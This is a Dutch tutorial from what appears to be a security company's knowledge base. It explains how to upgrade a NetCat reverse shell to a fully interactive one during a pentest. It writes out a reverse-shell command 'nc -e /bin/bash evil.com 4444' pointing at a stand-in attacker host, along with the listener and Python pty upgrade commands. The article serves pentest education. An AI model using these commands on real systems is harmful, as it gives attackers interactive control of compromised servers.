• Diensten
    • Pentest
    • Netwerk Pentest
    • Website Security Check
    • WebShepherd
    • Phishing Campagne
    • Mystery Guest
    • Vulnerability Management
    • Incident Response
    • Quickscan
  • NetCaptain
  • Kennisbank
  • Partners
    • MSP
  • Over ons
    • Contact
    • Waarom CyberAnt
    • Kennisgroep Cyber Security
    • Nieuws
    • Vacatures
  • Inloggen
  • NL
    • EN
  • Menu Menu

NetCat shell upgraden

De heilige graal tijdens een pentest is een goedwerkende shell. Wanneer het tijdens een pentest gelukt is om de server over te nemen door commando’s uit te kunnen voeren op het systeem, wordt er door de hacker vaak een verbinding opgezet naar zijn server. Hiervoor wordt vaak NetCat gebruikt. NetCat is een tool op Linux systemen dat het mogelijk maakt om andere programma’s via het internet te besturen. Een van de grootste frustraties voor hackers is echter dat de shell die teruggegeven wordt behoorlijk beperkt is. Deze binary kan afhankelijk van het systeem ook ncat of nc heten.

Hacken met NetCat

Stel, het is een hacker gelukt om een bestand te uploaden, genaamd shell.php:

De hacker zet op zijn eigen server (evil.com) een poort open die luistert op poort 4444. Dit doet hij met nc -lvp 4444. Nu wordt het commando nc -e /bin/bash evil.com 4444 uitgevoerd op de gehackte server. De gehackte server zal nu een verbinding opzetten naar de server van de hacker. Dit wordt een reverse tcp shell genoemd.


john@Technetium:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [1.2.3.4] port 4444 [tcp/*] accepted (family 2, sport 54490)
whoami
cyberant
^C
john@Technetium:~$ whoami
john

Hierboven staat wat een hacker te zien krijgt. Wanneer de hacker per ongeluk CTRL-C intoetst, is de shell niet meer beschikbaar. Ook werken commando’s waar interactie voor nodig (zoals su) is niet.

Hoe een Netcat Shell upgraden naar een interactieve shell?

De eerste stap die nodig is om dit te verbeteren is door met Python een interactieve shell te starten. Dit kan met de PTY module van Python, en werkt als volgt:

python -c 'import pty; pty.spawn("/bin/bash")'

Het bovenstaande commando levert een semi-interactieve shell op. Dat wil zeggen dat het mogelijk is om commando’s zoals su en mysql, die om een wachtwoord vragen. De shell sluit zichzelf nog steeds af met CTRL-C, en auto completion via TAB werkt ook niet. Met een paar simpele commando’s (en een beetje magie) is het mogelijk om naar een volledige shell te gaan.

Als CTRL-Z wordt uitgevoerd dan wordt de shell naar de achtergrond geplaatst. Vervolgens wordt er getypt (in de lokale terminal):
stty raw -echo
fg

Het bovenstaande zorgt ervoor dat er nu een volledige shell is, en alles kan wat via SSH bijvoorbeeld ook zou kunnen. Functies zoals tab completion en history werken nu. En VIM via NetCat? Sure!

reverse tcp shell
Deel dit artikel
  • Delen op Facebook
  • Delen op X
  • Delen op WhatsApp
  • Delen op LinkedIn
  • Delen via e-mail

Zoeken

Search Search

Recente berichten

  • Magecart aanval maakt 8,8 miljoen slachtoffers wereldwijd
  • Opnieuw malware aangetroffen in VS Code Extensies
  • Grootschalige aanval op populaire npm-packages: miljoenen websites en apps mogelijk getroffen
  • Leeftijdsverificatie op internet: hoe zit het met privacy?
  • Instellingen Microsoft Azure security audits

CyberAnt is ISO gecertificeerd

Iso gecertificeerd

Tags

.DS Store anti-virus award AWS broken access control clickjacking Cryptographic Failures cyberaanval CyberAnt Cybercrime cybercriminelen CyberRisk Cyber Security Datalek Entity injection Etisch Hacker genomineerd Hacker Insecure Design Instellingen AWS ISO 9001 ISO 27001 IT Infrastructuur beschermen malware Mass Assignment aanval NetCaptain NetCat shell upgraden Netgear ProSAFE switches Open web application Security project Owasp path traversal penetration test pentest Ransomeware aanval Ransomware Responsible Disclosure Security Audit Security audits Security Misconfiguration Server-side request forgery (SSRF) Social Engineering SQL Injection Veilige webshop vulnerability management web applicatie scanning
CyberAnt is ISO gecertificeerd

Diensten

  • Pentest
  • Netwerk Pentest
  • NetCaptain
  • Website Security Check
  • WebShepherd
  • Phishing Campagne
  • Mystery Guest
  • Incident Response

Cyberant

  • Waarom CyberAnt
  • Partners
  • Kennisbank
  • Nieuws
  • Over ons

Contact

Marconiweg 1
3899 BR Zeewolde

info@cyberant.com
+31 (0)85 047 1590

© Copyright - CyberAnt 2024
  • Link naar Facebook
  • Link naar LinkedIn
  • Link naar Mail
Link naar: Wat is clickjacking? Link naar: Wat is clickjacking? Wat is clickjacking?clickjackingCyberAnt.com Link naar: Wat is het risico van .DS_Store? Link naar: Wat is het risico van .DS_Store? Het .DS_store is een inhoudsopgave van je mapCyberAnt.comWat is het risico van .DS_Store?
Scroll naar bovenzijde Scroll naar bovenzijde Scroll naar bovenzijde

Deze site maakt gebruik van cookies. Door verder te surfen op de site gaat u akkoord met ons gebruik van cookies.

Accepteer instellingenVerberg de mededeling enkelInstellingen

Cookie en privacy instellingen



Hoe wij cookies gebruiken

We kunnen vragen om cookies op uw apparaat te plaatsen. We gebruiken cookies om ons te laten weten wanneer u onze websites bezoekt, hoe u met ons omgaat, om uw gebruikerservaring te verrijken en om uw relatie met onze website aan te passen.

Klik op de verschillende rubrieken voor meer informatie. U kunt ook enkele van uw voorkeuren wijzigen. Houd er rekening mee dat het blokkeren van sommige soorten cookies van invloed kan zijn op uw ervaring op onze websites en de services die we kunnen bieden.

Essentiële Website Cookies

Deze cookies zijn strikt noodzakelijk om u diensten aan te bieden die beschikbaar zijn via onze website en om sommige functies ervan te gebruiken.

Omdat deze cookies strikt noodzakelijk zijn om de website te leveren, heeft het weigeren ervan invloed op het functioneren van onze site. U kunt cookies altijd blokkeren of verwijderen door uw browserinstellingen te wijzigen en alle cookies op deze website geforceerd te blokkeren. Maar dit zal u altijd vragen om cookies te accepteren/weigeren wanneer u onze site opnieuw bezoekt.

We respecteren volledig als u cookies wilt weigeren, maar om te voorkomen dat we u telkens opnieuw vragen vriendelijk toe te staan om een cookie daarvoor op te slaan. U bent altijd vrij om u af te melden of voor andere cookies om een betere ervaring te krijgen. Als u cookies weigert, zullen we alle ingestelde cookies in ons domein verwijderen.

We bieden u een lijst met opgeslagen cookies op uw computer in ons domein, zodat u kunt controleren wat we hebben opgeslagen. Om veiligheidsredenen kunnen we geen cookies van andere domeinen tonen of wijzigen. U kunt deze controleren in de beveiligingsinstellingen van uw browser.

Overige externe diensten

We gebruiken ook verschillende externe services zoals Google Webfonts, Google Maps en externe videoproviders. Aangezien deze providers persoonlijke gegevens zoals uw IP-adres kunnen verzamelen, kunt u ze hier blokkeren. Houd er rekening mee dat dit de functionaliteit en het uiterlijk van onze site aanzienlijk kan verminderen. Wijzigingen zijn pas effectief zodra u de pagina herlaadt

Google Webfont Instellingen:

Google Maps Instellingen:

Google reCaptcha instellingen:

Vimeo en Youtube video's insluiten:

Privacybeleid

U kunt meer lezen over onze cookies en privacy-instellingen op onze Privacybeleid-pagina.

Privacyverklaring
Accepteer instellingenVerberg de mededeling enkel